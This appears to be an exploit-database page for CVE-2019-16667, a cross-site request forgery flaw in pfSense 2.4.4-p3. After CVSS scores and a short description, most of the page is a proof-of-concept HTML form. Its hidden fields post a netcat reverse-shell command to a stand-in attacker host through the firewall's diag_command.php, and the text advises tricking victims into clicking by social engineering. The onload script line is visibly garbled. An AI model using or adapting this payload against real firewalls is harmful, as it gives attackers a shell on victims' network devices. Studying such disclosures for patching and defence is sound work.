pfSense 2.4.4-p3 Cross Site Request Forgery

Credit: ghost_fh
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery # Date: 2019-09-27 # Exploit Author: ghost_fh # Vendor Homepage: # Software Link: # Version: Till 2.4.4-p3 # Tested on: freebsd # CVE : CVE-2019-16667 # Vulnerability Description :- The pfsense firewall is vulnerable to RCE # chained with CSRF as it uses `csrf magic` library since it allows to tamper # the CSRF token values submitted when processing the form requests. Due to # this flaw, an attacker can exploit this vulnerability by crafting new page # that contains attacker's controlled input such as a "reverse shell" (eg: # `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port # >/tmp/f`token value) in the form and entice the victims to click # on the crafted link via social engineering methods. Once the victim clicks # on the link (try again button in this case), the attacker can take the # lateral control of the victim's machine and malicious actions can be # performed on the victim's behalf. <!DOCTYPE html> <html> <body onload="document.createElement('form')'myForm'))"> <form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST"> <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc attacker_ip attacker_port >/tmp/f"> <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip attacker_port >/tmp/f"> <input type=hidden name="dlPath" value=""> <input type=hidden name="txtPHPCommand" value=""> <input type="hidden" name="submit" value="EXEC"> </form> </body> </html> # Create a malicious page containing the above values and once user clicks on malicious link, # he will be redirected to https://pfsense_ip/diag_command.php page. # Victim will be greeted with the "Try again" button. # Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top